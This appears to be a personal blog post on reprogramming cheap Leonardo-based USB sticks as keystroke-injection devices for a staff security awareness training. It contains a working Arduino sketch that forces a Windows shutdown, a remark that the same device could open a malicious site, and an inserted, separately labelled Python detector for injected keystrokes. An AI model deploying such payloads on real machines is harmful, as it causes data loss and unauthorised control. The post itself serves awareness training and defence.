Friday, 1 December 2017

Some fun with bad-usb devices (not rubber ducky)

Some fun with Leonardo-like usb devices

No, it is not rubber-ducky.

I was looking for a cheaper alternative to the rubber ducky devices to use for a user security awareness training at the media company I work for.

*** Check out the full video on my YouTube channel, coming soon ***

mmmmh... Payroll data. Who could resist?
I found those USB devices resembling an ordinary thumb drive here:
At a little under 10€, it is a somewhat overpriced Leonardo without any usable GPIOs, but it perfectly serves my purpose.

From what I could see with Wireshark's USB sniffer, my devices came without anything malicious preinstalled. As expected, the device identified as an Arduino Leonardo board.

Being what it is, it can easily be programmed in the Arduino IDE. Simply select it as a Leonardo board.


/*
  Some fun with Keyboard Emulation
  Shuts down a Windows machine after 20 seconds
*/
// Required since Arduino IDE 1.6.6, where the Keyboard API became a library;
// older IDE versions had it built in and did not need the include.
#include <Keyboard.h>

// some definitions I do not really use
char ctrlKey = KEY_LEFT_CTRL;
char winKey  = KEY_LEFT_GUI;
char altKey  = KEY_LEFT_ALT;

void setup() {
  // we only need a keyboard for this prank...
  Keyboard.begin();
}

void loop() {
  // 20 seconds to load a new sketch before the payload runs
  delay(20000);
  // Now run the shutdown command: Win+R opens the Run dialog
  Keyboard.press(KEY_LEFT_GUI);
  Keyboard.press('r');
  delay(200);
  Keyboard.releaseAll();
  delay(200);
  // type the command and confirm with Enter
  Keyboard.print("shutdown /t 1 /f /s");
  delay(100);
  Keyboard.press(KEY_RETURN);
  Keyboard.releaseAll();
  // wait forever...
  while (true);
}

This script works as expected and shuts down the PC. It could just as well start Internet Explorer and visit a malicious web site.
Keep in mind that everything runs under the current user's privileges, so users without administrative privileges can only do limited damage.
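As an added example that is not part of the original post: the usual host-side defence against a keystroke-injecting device like the sketch above is a timing heuristic. Keyboard.print() emits characters back to back at USB report rate, whereas a human cannot sustain very short inter-key intervals across a whole run of keystrokes. The threshold and window size below are assumptions, and the keystroke timestamps are constructed samples (on a real host they would come from the OS input layer).

```python
"""Timing heuristic for keystroke injection (e.g. an Arduino Leonardo HID)."""
from typing import List, Sequence

# Assumed threshold: even fast typists rarely go below ~30 ms between keys.
HUMAN_MIN_INTERVAL_S = 0.030
# Assumed window: this many consecutive keystrokes must all be "too fast".
WINDOW = 8


def is_injection(timestamps: Sequence[float],
                 min_interval: float = HUMAN_MIN_INTERVAL_S,
                 window: int = WINDOW) -> bool:
    """Return True if any `window` consecutive keystrokes arrive faster
    than `min_interval` seconds apart. Short bursts (key rollover, a quick
    double-tap) reset the counter and do not trigger."""
    if len(timestamps) < window:
        return False
    fast_pairs = 0
    for prev, cur in zip(timestamps, timestamps[1:]):
        if cur - prev < min_interval:
            fast_pairs += 1
            if fast_pairs >= window - 1:   # window keys => window-1 intervals
                return True
        else:
            fast_pairs = 0
    return False


def keystroke_times(text: str, start: float, interval_s: float) -> List[float]:
    """Constructed sample: one timestamp per typed character at a fixed rate."""
    return [start + i * interval_s for i in range(len(text))]


# Constructed samples: the sketch's payload typed by the device vs. by a person.
INJECTED = keystroke_times("shutdown /t 1 /f /s", 0.0, 0.002)   # ~2 ms apart
HUMAN = keystroke_times("shutdown /t 1 /f /s", 0.0, 0.120)      # ~8 chars/s
# A human with two short fast bursts (rollover) that must not trigger.
MIXED = [0.0, 0.005, 0.010, 0.015, 0.200, 0.205, 0.210, 0.215, 0.400]

if __name__ == "__main__":
    print("injected:", is_injection(INJECTED))  # True
    print("human:   ", is_injection(HUMAN))     # False
    print("mixed:   ", is_injection(MIXED))     # False
```

A real deployment would feed live keystroke timestamps into is_injection() and, on a hit, lock the session or detach the offending HID device.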

It became very clear to everyone attending my training that plugging in a USB device of unknown contents and origin is simply a bad idea.
